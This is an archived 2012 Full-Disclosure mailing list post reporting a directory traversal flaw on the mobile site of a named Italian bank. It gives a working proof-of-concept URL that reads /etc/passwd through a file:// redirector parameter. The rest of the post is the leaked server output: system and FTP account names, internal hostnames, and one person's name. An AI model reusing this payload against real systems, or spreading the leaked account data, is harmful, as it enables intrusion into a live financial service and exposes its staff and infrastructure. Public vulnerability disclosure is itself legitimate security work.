| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-Id: <1TBDbz-00088M-Oe@internal.tormail.org>
Date: Mon, 10 Sep 2012 23:41:51 -0000
From: tig3rhack@...mail.org
To: full-disclosure@...ts.grok.org.uk
Subject: m.bnl.it Vulnerable to Directory traversal
The site m.bnl.it mobile version of the site bnl.it owned by an Italian
bank, is vulnerable to a bug type Directory traversal, which would allow
an attacker to gain information on the server.
POC:
http://m.bnl.it/cam/bnl/redirector?&xrexurl=file%3a%2f%2f%2f/etc/passwd
>source page
root:x:0:0::/root:/bin/tcsh
bin:x:1:1:bin:/bin:/bin/false
daemon:x:2:2:daemon:/sbin:/bin/false
adm:x:3:4:adm:/var/log:/bin/false
lp:x:4:7:lp:/var/spool/lpd:/bin/false
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/:/bin/false
news:x:9:13:news:/usr/lib/news:/bin/false
uucp:x:10:14:uucp:/var/spool/uucppublic:/bin/false
operator:x:11:0:operator:/root:/bin/bash
games:x:12:100:games:/usr/games:/bin/false
ftp:x:14:50::/home/ftp:/bin/false
smmsp:x:25:25:smmsp:/var/spool/clientmqueue:/bin/false
mysql:x:27:27:MySQL:/var/lib/mysql:/bin/false
rpc:x:32:32:RPC portmap user:/:/bin/false
sshd:x:33:33:sshd:/:/bin/false
gdm:x:42:42:GDM:/var/state/gdm:/bin/bash
oprofile:x:51:51:oprofile:/:/bin/false
apache:x:80:80:User for Apache:/srv/httpd:/bin/false
messagebus:x:81:81:User for D-BUS:/var/run/dbus:/bin/false
haldaemon:x:82:82:User for HAL:/var/run/hald:/bin/false
pop:x:90:90:POP:/:/bin/false
nobody:x:99:99:nobody:/:/bin/false
crosia_p:x:1000:100:CROSIA Patrick,SYNTEN,,:/home/crosia_p:/bin/tcsh
wokup:x:1001:102:WOKUP,,,:/opt/tomcat:/bin/bash
mfortis:x:1002:100:Ftp Account
(MFORTIS.SYNTEN.COM),,,:/home/www/mfortis:/bin/false
mfortis-content:x:1003:100:Ftp Account
(MFORTIS-CONTENT.SYNTEN.COM),,,:/home/www/mfortis-content:/bin/false
mqafortis:x:1004:100:Ftp Account
(MQAFORTIS.SYNTEN.COM),,,:/home/www/mqafortis:/bin/false
mqafortis-content:x:1005:100:Ftp Account
(MQAFORTIS-CONTENT.SYNTEN.COM),,,:/home/www/mqafortis-content:/bin/false
mqafortis-dev:x:1006:100:Ftp Account
(MQAFORTIS-DEV.SYNTEN.COM),,,:/home/www/mqafortis-dev:/bin/false
mbnl:x:1007:100:Ftp Account
(MBNL.SYNTEN.COM),,,:/home/www/mbnl:/bin/false
mbnl-content:x:1008:100:Ftp Account
(MBNL-CONTENT.SYNTEN.COM),,,:/home/www/mbnl-content:/bin/false
mqabnl:x:1009:100:Ftp Account
(MQABNL.SYNTEN.COM),,,:/home/www/mqabnl:/bin/false
mqabnl-content:x:1010:100:Ftp Account
(MQABNL-CONTENT.SYNTEN.COM),,,:/home/www/mqabnl-content:/bin/fals
It should be noted that the admin security is not a optional
Share this:
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists